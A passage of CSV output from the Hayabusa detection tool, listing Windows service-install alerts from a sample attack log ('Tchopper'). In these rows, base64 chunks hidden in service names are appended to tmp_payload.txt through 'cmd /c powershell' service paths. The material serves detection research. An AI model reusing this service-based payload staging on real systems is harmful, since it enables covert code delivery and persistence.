c2VsZWN0aW9uIGJlZ2lucw0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:32.394 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjDQoNCmZ1bmN0aW9uIFNlbGVjdC1FeHBvcnRMb2NhdGlvbiB7IHBhcmFtKCREZXNjcmlwdGlvbiwgJFJvb3RGb2xkZXIpIA0KDQogICAgIHRyeSB7DQogICAgIA0KICAgICAgICAkb2JqRm9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:32.394 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjDQoNCmZ1bmN0aW9uIFNlbGVjdC1FeHBvcnRMb2NhdGlvbiB7IHBhcmFtKCREZXNjcmlwdGlvbiwgJFJvb3RGb2xkZXIpIA0KDQogICAgIHRyeSB7DQogICAgIA0KICAgICAgICAkb2JqRm9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:32.394 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjDQoNCmZ1bmN0aW9uIFNlbGVjdC1FeHBvcnRMb2NhdGlvbiB7IHBhcmFtKCREZXNjcmlwdGlvbiwgJFJvb3RGb2xkZXIpIA0KDQogICAgIHRyeSB7DQogICAgIA0KICAgICAgICAkb2JqRm9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:33.831 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bSA9IE5ldy1PYmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuRm9sZGVyQnJvd3NlckRpYWxvZw0KICAgICAgICAkb2JqRm9ybS5Sb290Zm9sZGVyID0gJFJvb3RGb2xkZXINCiAgICAgICAgJG9iak | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:33.831 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bSA9IE5ldy1PYmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuRm9sZGVyQnJvd3NlckRpYWxvZw0KICAgICAgICAkb2JqRm9ybS5Sb290Zm9sZGVyID0gJFJvb3RGb2xkZXINCiAgICAgICAgJG9iak | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:33.831 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bSA9IE5ldy1PYmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuRm9sZGVyQnJvd3NlckRpYWxvZw0KICAgICAgICAkb2JqRm9ybS5Sb290Zm9sZGVyID0gJFJvb3RGb2xkZXINCiAgICAgICAgJG9iak | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:35.440 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Zvcm0uRGVzY3JpcHRpb24gPSAkRGVzY3JpcHRpb24gICAgICAgIA0KICAgICAgICAkU2hvdyA9ICRvYmpGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgIGlmICgkU2hvdyAtRVEgIk9LIikgew0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:35.440 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Zvcm0uRGVzY3JpcHRpb24gPSAkRGVzY3JpcHRpb24gICAgICAgIA0KICAgICAgICAkU2hvdyA9ICRvYmpGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgIGlmICgkU2hvdyAtRVEgIk9LIikgew0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:35.440 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Zvcm0uRGVzY3JpcHRpb24gPSAkRGVzY3JpcHRpb24gICAgICAgIA0KICAgICAgICAkU2hvdyA9ICRvYmpGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgIGlmICgkU2hvdyAtRVEgIk9LIikgew0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:36.895 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgICAgDQogICAgICAgICAgICByZXR1cm4gJG9iakZvcm0uU2VsZWN0ZWRQYXRoDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIGVsc2UgeyAgICAgICAgICAgDQogICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:36.895 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgDQogICAgICAgICAgICByZXR1cm4gJG9iakZvcm0uU2VsZWN0ZWRQYXRoDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIGVsc2UgeyAgICAgICAgICAgDQogICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:36.895 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgDQogICAgICAgICAgICByZXR1cm4gJG9iakZvcm0uU2VsZWN0ZWRQYXRoDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIGVsc2UgeyAgICAgICAgICAgDQogICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:38.333 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJPcGVyYXRpb24gY2FuY2VsbGVkIGJ5IHVzZXIiDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclsw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:38.333 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJPcGVyYXRpb24gY2FuY2VsbGVkIGJ5IHVzZXIiDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclsw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:38.333 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJPcGVyYXRpb24gY2FuY2VsbGVkIGJ5IHVzZXIiDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclsw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:39.787 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: XQ0KDQogICAgICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:39.787 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: XQ0KDQogICAgICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:39.787 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: XQ0KDQogICAgICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:41.247 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICAgICAgZXhpdA0KICAgICAgICAgICAgDQogICAgICAgIH0gDQoNCiAgICAgICAgDQogICAgIH0NCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:41.247 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICAgICAgZXhpdA0KICAgICAgICAgICAgDQogICAgICAgIH0gDQoNCiAgICAgICAgDQogICAgIH0NCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:41.247 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICAgICAgZXhpdA0KICAgICAgICAgICAgDQogICAgICAgIH0gDQoNCiAgICAgICAgDQogICAgIH0NCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:42.700 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgDQogICAgIGNhdGNoIHsNCiAgICAgDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gU2VsZWN0IEZvbGRlciINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:42.700 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgDQogICAgIGNhdGNoIHsNCiAgICAgDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gU2VsZWN0IEZvbGRlciINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:42.700 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgDQogICAgIGNhdGNoIHsNCiAgICAgDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gU2VsZWN0IEZvbGRlciINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:44.139 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:44.139 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:44.139 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:45.593 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:45.593 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:45.593 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:47.051 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIERyb3AgRG93biBNZW51 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:47.051 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIERyb3AgRG93biBNZW51 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:47.051 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIERyb3AgRG93biBNZW51 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:48.519 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IGJhc2VkIG9uIHRoZSBnaXZlbiBEcm9wIERvd24gT3B0aW9ucw0KDQojQHBhcmFtICREcm9wRG93bk9wdGlvbnMgLT4gIFRoZSBFdmVudCBMb2cgdGhhdCB3aWxsIGJlIGV2YWx1YXRlZCAoU2VjdX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:48.519 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IGJhc2VkIG9uIHRoZSBnaXZlbiBEcm9wIERvd24gT3B0aW9ucw0KDQojQHBhcmFtICREcm9wRG93bk9wdGlvbnMgLT4gIFRoZSBFdmVudCBMb2cgdGhhdCB3aWxsIGJlIGV2YWx1YXRlZCAoU2VjdX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:48.519 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IGJhc2VkIG9uIHRoZSBnaXZlbiBEcm9wIERvd24gT3B0aW9ucw0KDQojQHBhcmFtICREcm9wRG93bk9wdGlvbnMgLT4gIFRoZSBFdmVudCBMb2cgdGhhdCB3aWxsIGJlIGV2YWx1YXRlZCAoU2VjdX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:49.957 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: JpdHksIEFwcGxpY2F0aW9uLCBTeXN0ZW0pDQojQHBhcmFtICRUaXRsZSAgICAgICAgICAgLT4gIFRoZSBUaXRsZSBvZiB0aGUgRHJvcCBEb3duIE1lbnUNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:49.957 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 